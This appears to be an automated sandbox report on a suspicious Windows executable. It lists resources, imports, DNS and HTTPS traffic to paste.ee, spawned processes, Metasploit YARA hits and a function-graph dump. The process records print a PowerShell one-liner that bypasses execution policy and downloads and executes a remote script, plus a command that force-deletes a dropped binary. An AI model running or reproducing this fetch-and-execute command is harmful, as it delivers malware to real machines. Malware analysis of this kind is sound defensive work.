                                      RT_ICON0x10346dc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.39395306859205775
                                      RT_GROUP_ICON0x1034f840x22dataEnglishUnited States0.9411764705882353
                                      RT_VERSION0x1034fa80x4f4dataEnglishUnited States0.2862776025236593
                                      RT_MANIFEST0x103549c0x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
                                      DLLImport
                                      kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 28, 2024 15:16:35.242903948 CET49712443192.168.2.8188.114.97.3
                                      Oct 28, 2024 15:16:35.242950916 CET44349712188.114.97.3192.168.2.8
                                      Oct 28, 2024 15:16:35.243035078 CET49712443192.168.2.8188.114.97.3
                                      Oct 28, 2024 15:16:35.255039930 CET49712443192.168.2.8188.114.97.3
                                      Oct 28, 2024 15:16:35.255070925 CET44349712188.114.97.3192.168.2.8
                                      Oct 28, 2024 15:16:35.859103918 CET44349712188.114.97.3192.168.2.8
                                      Oct 28, 2024 15:16:35.859185934 CET49712443192.168.2.8188.114.97.3
                                      Oct 28, 2024 15:16:35.894399881 CET49712443192.168.2.8188.114.97.3
                                      Oct 28, 2024 15:16:35.894433975 CET44349712188.114.97.3192.168.2.8
                                      Oct 28, 2024 15:16:35.894777060 CET44349712188.114.97.3192.168.2.8
                                      Oct 28, 2024 15:16:35.914676905 CET49712443192.168.2.8188.114.97.3
                                      Oct 28, 2024 15:16:35.959342957 CET44349712188.114.97.3192.168.2.8
                                      Oct 28, 2024 15:16:36.341269016 CET44349712188.114.97.3192.168.2.8
                                      Oct 28, 2024 15:16:36.341326952 CET44349712188.114.97.3192.168.2.8
                                      Oct 28, 2024 15:16:36.341480970 CET49712443192.168.2.8188.114.97.3
                                      Oct 28, 2024 15:16:36.345411062 CET49712443192.168.2.8188.114.97.3
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 28, 2024 15:16:35.225148916 CET5120053192.168.2.81.1.1.1
                                      Oct 28, 2024 15:16:35.234810114 CET53512001.1.1.1192.168.2.8
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 28, 2024 15:16:35.225148916 CET192.168.2.81.1.1.10x7a38Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 28, 2024 15:16:35.234810114 CET1.1.1.1192.168.2.80x7a38No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                      Oct 28, 2024 15:16:35.234810114 CET1.1.1.1192.168.2.80x7a38No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                      • paste.ee
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.849712188.114.97.34436692C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-28 14:16:35 UTC160OUTGET /d/7BWJv HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: paste.ee
                                      Connection: Keep-Alive
                                      2024-10-28 14:16:36 UTC720INHTTP/1.1 404 Not Found
                                      Date: Mon, 28 Oct 2024 14:16:36 GMT
                                      Content-Length: 0
                                      Connection: close
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UStKtoUB%2BMn6VxYd6LAGk1XSBFZccNRFH%2F%2F0%2BRkciZyvLTVzmdhTZsKMaAYaMJJXp%2FETulPobVU%2BrdHglxWwYdtXDGFlCmkgTWBrD5VdVLznzv6mByPejcM1iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d9b8b691fd32ca2-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1108&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2815&recv_bytes=774&delivery_rate=2562831&cwnd=251&unsent_bytes=0&cid=b691612755f26c0e&ts=493&x=0"


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:10:16:16
                                      Start date:28/10/2024
                                      Path:C:\Users\user\Desktop\EwKKdCrEDu.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\EwKKdCrEDu.exe"
                                      Imagebase:0x370000
                                      File size:16'803'840 bytes
                                      MD5 hash:2DC8CDF825E23FF1DF1AD11B3A6F1973
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1671695054.0000000001E40000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1671695054.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:10:16:26
                                      Start date:28/10/2024
                                      Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                      Imagebase:0xaf0000
                                      File size:231'736 bytes
                                      MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:4
                                      Start time:10:16:33
                                      Start date:28/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
                                      Imagebase:0xf0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:10:16:33
                                      Start date:28/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6ee680000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:10:16:34
                                      Start date:28/10/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                      Imagebase:0xa40000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:10:16:34
                                      Start date:28/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6ee680000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:7.4%
                                        Total number of Nodes:1794
                                        Total number of Limit Nodes:14
                                        execution_graph 12605 6e946c 12608 6e93f3 12605->12608 12609 6e93ff __FrameHandler3::FrameUnwindToState 12608->12609 12616 6edaca EnterCriticalSection 12609->12616 12611 6e9437 12617 6e9455 12611->12617 12612 6e9409 12612->12611 12614 6ee4f5 __strnicoll 14 API calls 12612->12614 12614->12612 12616->12612 12620 6edb12 LeaveCriticalSection 12617->12620 12619 6e9443 12620->12619 12671 6ea740 12672 6ea74c __FrameHandler3::FrameUnwindToState 12671->12672 12683 6edaca EnterCriticalSection 12672->12683 12674 6ea753 12684 6edc25 12674->12684 12682 6ea771 12708 6ea797 12682->12708 12683->12674 12685 6edc31 __FrameHandler3::FrameUnwindToState 12684->12685 12686 6edc3a 12685->12686 12687 6edc5b 12685->12687 12689 6e9cff __strnicoll 14 API calls 12686->12689 12711 6edaca EnterCriticalSection 12687->12711 12690 6edc3f 12689->12690 12691 6e87ea __strnicoll 41 API calls 12690->12691 12692 6ea762 12691->12692 12692->12682 12697 6ea5da GetStartupInfoW 12692->12697 12693 6edc67 12696 6edc93 12693->12696 12712 6edb75 12693->12712 12719 6edcba 12696->12719 12698 6ea68b 12697->12698 12699 6ea5f7 12697->12699 12703 6ea690 12698->12703 12699->12698 12700 6edc25 42 API calls 12699->12700 12701 6ea61f 12700->12701 12701->12698 12702 6ea64f GetFileType 12701->12702 12702->12701 12704 6ea697 12703->12704 12705 6ea6da GetStdHandle 12704->12705 12706 6ea73c 12704->12706 12707 6ea6ed GetFileType 12704->12707 12705->12704 12706->12682 12707->12704 12728 6edb12 LeaveCriticalSection 12708->12728 12710 6ea782 12711->12693 12713 6e9d12 __dosmaperr 14 API calls 12712->12713 12715 6edb87 12713->12715 12714 6edb94 12716 6e9d6f __freea 14 API calls 12714->12716 12715->12714 12722 6ea11c 12715->12722 12718 6edbe9 12716->12718 12718->12693 12727 6edb12 LeaveCriticalSection 12719->12727 12721 6edcc1 12721->12692 12723 6e9edc __dosmaperr 5 API calls 12722->12723 12724 6ea138 12723->12724 12725 6ea156 InitializeCriticalSectionAndSpinCount 12724->12725 12726 6ea141 12724->12726 12725->12726 12726->12715 12727->12721 12728->12710 12599 6ed121 12600 6ed12a 12599->12600 12601 6ed15c 12599->12601 12602 6ebf27 41 API calls 12600->12602 12603 6ed14d 12602->12603 12604 6ecf2c 52 API calls 12603->12604 12604->12601 10634 6e19bb 10635 6e19c7 __FrameHandler3::FrameUnwindToState 10634->10635 10660 6e1c2c 10635->10660 10637 6e19ce 10638 6e1b27 10637->10638 10648 6e19f8 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 10637->10648 10727 6e1f1a IsProcessorFeaturePresent 10638->10727 10640 6e1b2e 10707 6e937b 10640->10707 10645 6e1a17 10646 6e1a98 10668 6e8fed 10646->10668 10648->10645 10648->10646 10710 6e9355 10648->10710 10650 6e1a9e 10672 6e1210 10650->10672 10652 6e1ab5 10716 6e2034 GetModuleHandleW 10652->10716 10655 6e1ac3 10656 6e1acc 10655->10656 10718 6e9330 10655->10718 10721 6e1d9d 10656->10721 10661 6e1c35 10660->10661 10734 6e22ca IsProcessorFeaturePresent 10661->10734 10665 6e1c46 10666 6e1c4a 10665->10666 10744 6e2e2d 10665->10744 10666->10637 10669 6e8ff6 10668->10669 10670 6e8ffb 10668->10670 10804 6e8d47 10669->10804 10670->10650 11461 6e16d0 10672->11461 10674 6e12ae 10675 6e15d0 46 API calls 10674->10675 10694 6e12c0 10675->10694 10676 6e1270 10676->10674 10683 6e13ad 10676->10683 10678 6e1579 10680 6e87fa 41 API calls 10678->10680 10679 6e130c __FrameHandler3::FrameUnwindToState 10681 6e1326 CreateProcessA 10679->10681 10693 6e157e 10680->10693 10685 6e1374 10681->10685 10688 6e139d 10681->10688 10682 6e15a6 10682->10652 10684 6e1574 10683->10684 10687 6e16d0 46 API calls 10683->10687 11508 6e16c0 10684->11508 10685->10688 10695 6e156f 10685->10695 10687->10694 10689 6e147e Sleep 10688->10689 10690 6e146a GetLastError 10688->10690 11492 6e2e80 10689->11492 11499 6e1010 10690->11499 10693->10682 10699 6e87fa 41 API calls 10693->10699 10694->10678 11476 6e15d0 10694->11476 11503 6e87fa 10695->11503 10701 6e15ca 10699->10701 10702 6e14d7 CreateProcessW CloseHandle CloseHandle 10703 6e1527 10702->10703 10704 6e1548 10702->10704 10703->10678 10703->10704 10705 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10704->10705 10706 6e156b 10705->10706 10706->10652 12432 6e91af 10707->12432 10711 6e936b __FrameHandler3::FrameUnwindToState __dosmaperr 10710->10711 10711->10646 10712 6ebe6c _unexpected 41 API calls 10711->10712 10715 6e9abd 10712->10715 10713 6e9b03 __FrameHandler3::FrameUnwindToState 41 API calls 10714 6e9ae7 10713->10714 10715->10713 10717 6e1abf 10716->10717 10717->10640 10717->10655 10719 6e91af __FrameHandler3::FrameUnwindToState 21 API calls 10718->10719 10720 6e933b 10719->10720 10720->10656 10722 6e1da9 10721->10722 10723 6e1ad5 10722->10723 12505 6e9a1d 10722->12505 10723->10645 10725 6e1db7 10726 6e2e2d ___scrt_uninitialize_crt 7 API calls 10725->10726 10726->10723 10728 6e1f30 __FrameHandler3::FrameUnwindToState 10727->10728 10729 6e1fdb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10728->10729 10730 6e201f __FrameHandler3::FrameUnwindToState 10729->10730 10730->10640 10731 6e933f 10732 6e91af __FrameHandler3::FrameUnwindToState 21 API calls 10731->10732 10733 6e1b3c 10732->10733 10735 6e1c41 10734->10735 10736 6e2e0e 10735->10736 10750 6e4017 10736->10750 10740 6e2e1f 10741 6e2e2a 10740->10741 10764 6e4053 10740->10764 10741->10665 10743 6e2e17 10743->10665 10745 6e2e36 10744->10745 10746 6e2e40 10744->10746 10747 6e30c9 ___vcrt_uninitialize_ptd 6 API calls 10745->10747 10746->10666 10748 6e2e3b 10747->10748 10749 6e4053 ___vcrt_uninitialize_locks DeleteCriticalSection 10748->10749 10749->10746 10751 6e4020 10750->10751 10753 6e4049 10751->10753 10754 6e2e13 10751->10754 10768 6e425c 10751->10768 10755 6e4053 ___vcrt_uninitialize_locks DeleteCriticalSection 10753->10755 10754->10743 10756 6e3096 10754->10756 10755->10754 10785 6e416d 10756->10785 10759 6e30ab 10759->10740 10762 6e30c6 10762->10740 10765 6e407d 10764->10765 10766 6e405e 10764->10766 10765->10743 10767 6e4068 DeleteCriticalSection 10766->10767 10767->10765 10767->10767 10773 6e4082 10768->10773 10771 6e4294 InitializeCriticalSectionAndSpinCount 10772 6e427f 10771->10772 10772->10751 10774 6e409f 10773->10774 10775 6e40a3 10773->10775 10774->10771 10774->10772 10775->10774 10776 6e410b GetProcAddress 10775->10776 10778 6e40fc 10775->10778 10780 6e4122 LoadLibraryExW 10775->10780 10776->10774 10778->10776 10779 6e4104 FreeLibrary 10778->10779 10779->10776 10781 6e4169 10780->10781 10782 6e4139 GetLastError 10780->10782 10781->10775 10782->10781 10783 6e4144 ___vcrt_FlsSetValue 10782->10783 10783->10781 10784 6e415a LoadLibraryExW 10783->10784 10784->10775 10786 6e4082 ___vcrt_FlsSetValue 5 API calls 10785->10786 10787 6e4187 10786->10787 10788 6e41a0 TlsAlloc 10787->10788 10789 6e30a0 10787->10789 10789->10759 10790 6e421e 10789->10790 10791 6e4082 ___vcrt_FlsSetValue 5 API calls 10790->10791 10792 6e4238 10791->10792 10793 6e30b9 10792->10793 10794 6e4253 TlsSetValue 10792->10794 10793->10762 10795 6e30c9 10793->10795 10794->10793 10796 6e30d3 10795->10796 10797 6e30d9 10795->10797 10799 6e41a8 10796->10799 10797->10759 10800 6e4082 ___vcrt_FlsSetValue 5 API calls 10799->10800 10801 6e41c2 10800->10801 10802 6e41da TlsFree 10801->10802 10803 6e41ce 10801->10803 10802->10803 10803->10797 10805 6e8d50 10804->10805 10808 6e8d66 10804->10808 10805->10808 10810 6e8d73 10805->10810 10807 6e8d5d 10807->10808 10827 6e8ede 10807->10827 10808->10670 10811 6e8d7f 10810->10811 10812 6e8d7c 10810->10812 10835 6ed121 10811->10835 10812->10807 10817 6e8d9c 10868 6e8dcd 10817->10868 10818 6e8d90 10862 6e9d6f 10818->10862 10823 6e9d6f __freea 14 API calls 10824 6e8dc0 10823->10824 10825 6e9d6f __freea 14 API calls 10824->10825 10826 6e8dc6 10825->10826 10826->10807 10828 6e8f4f 10827->10828 10830 6e8eed 10827->10830 10828->10808 10829 6ed5bc WideCharToMultiByte ___scrt_uninitialize_crt 10829->10830 10830->10828 10830->10829 10831 6e9d12 __dosmaperr 14 API calls 10830->10831 10833 6e8f53 10830->10833 10834 6e9d6f __freea 14 API calls 10830->10834 10831->10830 10832 6e9d6f __freea 14 API calls 10832->10828 10833->10832 10834->10830 10836 6ed12a 10835->10836 10837 6e8d85 10835->10837 10890 6ebf27 10836->10890 10841 6ed65f GetEnvironmentStringsW 10837->10841 10842 6ed677 10841->10842 10847 6e8d8a 10841->10847 10843 6ed5bc ___scrt_uninitialize_crt WideCharToMultiByte 10842->10843 10844 6ed694 10843->10844 10845 6ed69e FreeEnvironmentStringsW 10844->10845 10846 6ed6a9 10844->10846 10845->10847 10848 6ea7cc __strnicoll 15 API calls 10846->10848 10847->10817 10847->10818 10849 6ed6b0 10848->10849 10850 6ed6b8 10849->10850 10851 6ed6c9 10849->10851 10853 6e9d6f __freea 14 API calls 10850->10853 10852 6ed5bc ___scrt_uninitialize_crt WideCharToMultiByte 10851->10852 10854 6ed6d9 10852->10854 10855 6ed6bd FreeEnvironmentStringsW 10853->10855 10856 6ed6e8 10854->10856 10857 6ed6e0 10854->10857 10855->10847 10859 6e9d6f __freea 14 API calls 10856->10859 10858 6e9d6f __freea 14 API calls 10857->10858 10860 6ed6e6 FreeEnvironmentStringsW 10858->10860 10859->10860 10860->10847 10863 6e9d7a HeapFree 10862->10863 10867 6e8d96 10862->10867 10864 6e9d8f GetLastError 10863->10864 10863->10867 10865 6e9d9c __dosmaperr 10864->10865 10866 6e9cff __strnicoll 12 API calls 10865->10866 10866->10867 10867->10807 10869 6e8de2 10868->10869 10870 6e9d12 __dosmaperr 14 API calls 10869->10870 10871 6e8e09 10870->10871 10872 6e8e11 10871->10872 10881 6e8e1b 10871->10881 10873 6e9d6f __freea 14 API calls 10872->10873 10889 6e8da3 10873->10889 10874 6e8e78 10875 6e9d6f __freea 14 API calls 10874->10875 10875->10889 10876 6e9d12 __dosmaperr 14 API calls 10876->10881 10877 6e8e87 11451 6e8eaf 10877->11451 10881->10874 10881->10876 10881->10877 10882 6e8ea2 10881->10882 10884 6e9d6f __freea 14 API calls 10881->10884 11442 6e9b47 10881->11442 11457 6e8817 IsProcessorFeaturePresent 10882->11457 10883 6e9d6f __freea 14 API calls 10886 6e8e94 10883->10886 10884->10881 10888 6e9d6f __freea 14 API calls 10886->10888 10887 6e8eae 10888->10889 10889->10823 10891 6ebf32 10890->10891 10894 6ebf38 10890->10894 10941 6ea09b 10891->10941 10896 6ebf3e 10894->10896 10946 6ea0da 10894->10946 10899 6ebf43 10896->10899 10963 6e9b03 10896->10963 10897 6ebf56 10951 6e9d12 10897->10951 10918 6ecf2c 10899->10918 10903 6ebf7f 10906 6ea0da __dosmaperr 6 API calls 10903->10906 10904 6ebf6a 10905 6ea0da __dosmaperr 6 API calls 10904->10905 10907 6ebf76 10905->10907 10908 6ebf8b 10906->10908 10911 6e9d6f __freea 14 API calls 10907->10911 10909 6ebf9e 10908->10909 10910 6ebf8f 10908->10910 10958 6ebc9a 10909->10958 10912 6ea0da __dosmaperr 6 API calls 10910->10912 10914 6ebf7c 10911->10914 10912->10907 10914->10896 10916 6e9d6f __freea 14 API calls 10917 6ebfb0 10916->10917 10917->10899 11243 6ed081 10918->11243 10925 6ecf88 10927 6e9d6f __freea 14 API calls 10925->10927 10926 6ecf96 11270 6ed17c 10926->11270 10929 6ecf6f 10927->10929 10929->10837 10931 6ecfce 10932 6e9cff __strnicoll 14 API calls 10931->10932 10934 6ecfd3 10932->10934 10933 6ed015 10936 6ed05e 10933->10936 11281 6ecba5 10933->11281 10937 6e9d6f __freea 14 API calls 10934->10937 10935 6ecfe9 10935->10933 10938 6e9d6f __freea 14 API calls 10935->10938 10940 6e9d6f __freea 14 API calls 10936->10940 10937->10929 10938->10933 10940->10929 10974 6e9edc 10941->10974 10944 6ea0d2 TlsGetValue 10945 6ea0c0 10945->10894 10947 6e9edc __dosmaperr 5 API calls 10946->10947 10948 6ea0f6 10947->10948 10949 6ea0ff 10948->10949 10950 6ea114 TlsSetValue 10948->10950 10949->10896 10949->10897 10956 6e9d1f __dosmaperr 10951->10956 10952 6e9d5f 10992 6e9cff 10952->10992 10953 6e9d4a HeapAlloc 10955 6e9d5d 10953->10955 10953->10956 10955->10903 10955->10904 10956->10952 10956->10953 10989 6e9540 10956->10989 11029 6ebb2e 10958->11029 11131 6ee738 10963->11131 10966 6e9b13 10968 6e9b1d IsProcessorFeaturePresent 10966->10968 10973 6e9b3c 10966->10973 10970 6e9b29 10968->10970 10969 6e933f __FrameHandler3::FrameUnwindToState 21 API calls 10971 6e9b46 10969->10971 11161 6e85ee 10970->11161 10973->10969 10975 6e9f0c 10974->10975 10976 6e9f08 10974->10976 10975->10976 10981 6e9e11 10975->10981 10976->10944 10976->10945 10979 6e9f26 GetProcAddress 10979->10976 10980 6e9f36 __dosmaperr 10979->10980 10980->10976 10987 6e9e22 ___vcrt_FlsSetValue 10981->10987 10982 6e9e40 LoadLibraryExW 10984 6e9ebf 10982->10984 10985 6e9e5b GetLastError 10982->10985 10983 6e9eb8 10983->10976 10983->10979 10984->10983 10986 6e9ed1 FreeLibrary 10984->10986 10985->10987 10986->10983 10987->10982 10987->10983 10988 6e9e8e LoadLibraryExW 10987->10988 10988->10984 10988->10987 10995 6e956c 10989->10995 11006 6ebfbd GetLastError 10992->11006 10994 6e9d04 10994->10955 10996 6e9578 __FrameHandler3::FrameUnwindToState 10995->10996 11001 6edaca EnterCriticalSection 10996->11001 10998 6e9583 __FrameHandler3::FrameUnwindToState 11002 6e95ba 10998->11002 11001->10998 11005 6edb12 LeaveCriticalSection 11002->11005 11004 6e954b 11004->10956 11005->11004 11007 6ebfd9 11006->11007 11008 6ebfd3 11006->11008 11009 6ea0da __dosmaperr 6 API calls 11007->11009 11012 6ebfdd SetLastError 11007->11012 11010 6ea09b __dosmaperr 6 API calls 11008->11010 11011 6ebff5 11009->11011 11010->11007 11011->11012 11014 6e9d12 __dosmaperr 12 API calls 11011->11014 11012->10994 11015 6ec00a 11014->11015 11016 6ec012 11015->11016 11017 6ec023 11015->11017 11018 6ea0da __dosmaperr 6 API calls 11016->11018 11019 6ea0da __dosmaperr 6 API calls 11017->11019 11026 6ec020 11018->11026 11020 6ec02f 11019->11020 11021 6ec04a 11020->11021 11022 6ec033 11020->11022 11025 6ebc9a __dosmaperr 12 API calls 11021->11025 11023 6ea0da __dosmaperr 6 API calls 11022->11023 11023->11026 11024 6e9d6f __freea 12 API calls 11024->11012 11027 6ec055 11025->11027 11026->11024 11028 6e9d6f __freea 12 API calls 11027->11028 11028->11012 11030 6ebb3a __FrameHandler3::FrameUnwindToState 11029->11030 11043 6edaca EnterCriticalSection 11030->11043 11032 6ebb44 11044 6ebb74 11032->11044 11035 6ebc40 11036 6ebc4c __FrameHandler3::FrameUnwindToState 11035->11036 11048 6edaca EnterCriticalSection 11036->11048 11038 6ebc56 11049 6ebe21 11038->11049 11040 6ebc6e 11053 6ebc8e 11040->11053 11043->11032 11047 6edb12 LeaveCriticalSection 11044->11047 11046 6ebb62 11046->11035 11047->11046 11048->11038 11050 6ebe57 __dosmaperr 11049->11050 11051 6ebe30 __dosmaperr 11049->11051 11050->11040 11051->11050 11056 6ee228 11051->11056 11130 6edb12 LeaveCriticalSection 11053->11130 11055 6ebc7c 11055->10916 11057 6ee2a8 11056->11057 11059 6ee23e 11056->11059 11060 6e9d6f __freea 14 API calls 11057->11060 11082 6ee2f6 11057->11082 11059->11057 11062 6ee271 11059->11062 11066 6e9d6f __freea 14 API calls 11059->11066 11061 6ee2ca 11060->11061 11063 6e9d6f __freea 14 API calls 11061->11063 11068 6e9d6f __freea 14 API calls 11062->11068 11083 6ee293 11062->11083 11064 6ee2dd 11063->11064 11067 6e9d6f __freea 14 API calls 11064->11067 11065 6e9d6f __freea 14 API calls 11069 6ee29d 11065->11069 11071 6ee266 11066->11071 11073 6ee2eb 11067->11073 11074 6ee288 11068->11074 11075 6e9d6f __freea 14 API calls 11069->11075 11070 6ee364 11076 6e9d6f __freea 14 API calls 11070->11076 11084 6ede1a 11071->11084 11072 6ee304 11072->11070 11078 6e9d6f 14 API calls __freea 11072->11078 11079 6e9d6f __freea 14 API calls 11073->11079 11112 6edf18 11074->11112 11075->11057 11081 6ee36a 11076->11081 11078->11072 11079->11082 11081->11050 11124 6ee399 11082->11124 11083->11065 11085 6ede2b 11084->11085 11111 6edf14 11084->11111 11086 6ede3c 11085->11086 11087 6e9d6f __freea 14 API calls 11085->11087 11088 6ede4e 11086->11088 11090 6e9d6f __freea 14 API calls 11086->11090 11087->11086 11089 6ede60 11088->11089 11091 6e9d6f __freea 14 API calls 11088->11091 11092 6ede72 11089->11092 11093 6e9d6f __freea 14 API calls 11089->11093 11090->11088 11091->11089 11094 6ede84 11092->11094 11095 6e9d6f __freea 14 API calls 11092->11095 11093->11092 11096 6ede96 11094->11096 11098 6e9d6f __freea 14 API calls 11094->11098 11095->11094 11097 6edea8 11096->11097 11099 6e9d6f __freea 14 API calls 11096->11099 11100 6edeba 11097->11100 11101 6e9d6f __freea 14 API calls 11097->11101 11098->11096 11099->11097 11102 6edecc 11100->11102 11103 6e9d6f __freea 14 API calls 11100->11103 11101->11100 11104 6edede 11102->11104 11105 6e9d6f __freea 14 API calls 11102->11105 11103->11102 11106 6e9d6f __freea 14 API calls 11104->11106 11107 6edef0 11104->11107 11105->11104 11106->11107 11108 6e9d6f __freea 14 API calls 11107->11108 11109 6edf02 11107->11109 11108->11109 11110 6e9d6f __freea 14 API calls 11109->11110 11109->11111 11110->11111 11111->11062 11113 6edf25 11112->11113 11123 6edf7d 11112->11123 11114 6edf35 11113->11114 11115 6e9d6f __freea 14 API calls 11113->11115 11116 6edf47 11114->11116 11117 6e9d6f __freea 14 API calls 11114->11117 11115->11114 11118 6e9d6f __freea 14 API calls 11116->11118 11119 6edf59 11116->11119 11117->11116 11118->11119 11120 6e9d6f __freea 14 API calls 11119->11120 11121 6edf6b 11119->11121 11120->11121 11122 6e9d6f __freea 14 API calls 11121->11122 11121->11123 11122->11123 11123->11083 11125 6ee3c5 11124->11125 11126 6ee3a6 11124->11126 11125->11072 11126->11125 11127 6edfa6 __dosmaperr 14 API calls 11126->11127 11128 6ee3bf 11127->11128 11129 6e9d6f __freea 14 API calls 11128->11129 11129->11125 11130->11055 11167 6ee666 11131->11167 11134 6ee77d 11135 6ee789 __FrameHandler3::FrameUnwindToState 11134->11135 11136 6ebfbd __dosmaperr 14 API calls 11135->11136 11137 6ee7d9 11135->11137 11138 6ee7eb __FrameHandler3::FrameUnwindToState 11135->11138 11143 6ee7ba __FrameHandler3::FrameUnwindToState 11135->11143 11136->11143 11139 6e9cff __strnicoll 14 API calls 11137->11139 11140 6ee821 __FrameHandler3::FrameUnwindToState 11138->11140 11180 6edaca EnterCriticalSection 11138->11180 11141 6ee7de 11139->11141 11146 6ee85e 11140->11146 11147 6ee95b 11140->11147 11157 6ee88c 11140->11157 11178 6e87ea 11141->11178 11143->11137 11143->11138 11160 6ee7c3 11143->11160 11146->11157 11181 6ebe6c GetLastError 11146->11181 11148 6ee966 11147->11148 11212 6edb12 LeaveCriticalSection 11147->11212 11151 6e933f __FrameHandler3::FrameUnwindToState 21 API calls 11148->11151 11153 6ee96e 11151->11153 11154 6ebe6c _unexpected 41 API calls 11158 6ee8e1 11154->11158 11156 6ebe6c _unexpected 41 API calls 11156->11157 11208 6ee907 11157->11208 11159 6ebe6c _unexpected 41 API calls 11158->11159 11158->11160 11159->11160 11160->10966 11162 6e860a __FrameHandler3::FrameUnwindToState 11161->11162 11163 6e8636 IsDebuggerPresent 